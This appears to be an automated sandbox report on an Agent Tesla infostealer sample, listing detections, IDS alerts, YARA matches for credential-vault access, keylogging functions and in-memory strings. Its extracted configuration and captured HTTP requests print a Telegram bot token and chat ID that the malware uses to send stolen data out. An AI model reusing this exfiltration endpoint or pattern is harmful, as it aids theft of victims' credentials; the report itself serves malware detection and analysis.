2024-10-08T10:00:36.064329+0200	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49736	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendMessage?chat_id=-4195170748"}
Source: eFzAvsOm.exe.8104.13.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Virustotal: Detection: 30%			Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Virustotal: Detection: 30%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: eLRW.pdbSHA256 source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, eFzAvsOm.exe.0.dr
Source:	Binary string: eLRW.pdb source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, eFzAvsOm.exe.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 4x nop then jmp 06FF5768h		0_2_06FF59B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 4x nop then jmp 06FF5768h		0_2_06FF5AC3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49736

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: POST /bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce74dbfe87fdaHost: api.telegram.orgContent-Length: 916Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce74dc2626ac8Host: api.telegram.orgContent-Length: 916Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce74dbfe87fdaHost: api.telegram.orgContent-Length: 916Expect: 100-continueConnection: Keep-Alive

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1769422438.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1817829131.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, WlTRkNu7R3i.cs	.Net Code: p8gw
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, WlTRkNu7R3i.cs	.Net Code: p8gw
Source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, WlTRkNu7R3i.cs	.Net Code: p8gw

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_023DF044	0_2_023DF044
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_04B626E8	0_2_04B626E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_04B626D7	0_2_04B626D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C11248	0_2_06C11248
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C13A50	0_2_06C13A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C1D3D4	0_2_06C1D3D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C5F1F0	0_2_06C5F1F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C5EDB8	0_2_06C5EDB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06C5E980	0_2_06C5E980
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06FF0AE0	0_2_06FF0AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06FF1490	0_2_06FF1490
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 0_2_06FF8880	0_2_06FF8880
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E44A48	8_2_00E44A48
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E4CD88	8_2_00E4CD88
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E43E30	8_2_00E43E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E44178	8_2_00E44178
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E4AB95	8_2_00E4AB95
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F0BCE0	8_2_05F0BCE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F0DC00	8_2_05F0DC00
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F03F38	8_2_05F03F38
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F02EF0	8_2_05F02EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F056C8	8_2_05F056C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F00040	8_2_05F00040
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F08B6A	8_2_05F08B6A
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F09AC8	8_2_05F09AC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F04FE8	8_2_05F04FE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_05F0362B	8_2_05F0362B
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_069B3891	8_2_069B3891
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Code function: 8_2_00E4D130	8_2_00E4D130
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_02BFF044	10_2_02BFF044
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_057C26E8	10_2_057C26E8
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_057C26D7	10_2_057C26D7
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_07011340	10_2_07011340
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_0701D3D4	10_2_0701D3D4
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_07013A50	10_2_07013A50
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_0705F1F0	10_2_0705F1F0
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_0705EDB8	10_2_0705EDB8
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 10_2_0705E980	10_2_0705E980
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DC9358	13_2_02DC9358
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DC4178	13_2_02DC4178
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DC4A48	13_2_02DC4A48
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DC9B10	13_2_02DC9B10
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DC3E30	13_2_02DC3E30
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DCCD88	13_2_02DCCD88
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E2EF0	13_2_062E2EF0
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E56C8	13_2_062E56C8
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E3F38	13_2_062E3F38
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062EDC10	13_2_062EDC10
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062EBCE0	13_2_062EBCE0
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E9AC8	13_2_062E9AC8
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E8B78	13_2_062E8B78
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E0040	13_2_062E0040
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E3640	13_2_062E3640
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_062E4FE8	13_2_062E4FE8
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_07143891	13_2_07143891
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Code function: 13_2_02DCD130	13_2_02DCD130

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb895170f-e66e-4f3b-8dda-299a96988975.exe4 vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1769422438.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb895170f-e66e-4f3b-8dda-299a96988975.exe4 vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1775633710.0000000007160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EI vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1776126239.0000000008440000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000000.1697523907.00000000000C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameeLRW.exeL vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1767892641.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2940718792.000000000043E000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb895170f-e66e-4f3b-8dda-299a96988975.exe4 vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2941312205.00000000009B9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Binary or memory string: OriginalFilenameeLRW.exeL vs SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: eFzAvsOm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, yxFFd7F.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, yxFFd7F.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, yxFFd7F.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, yxFFd7F.cs	Cryptographic APIs: 'TransformFinalBlock'
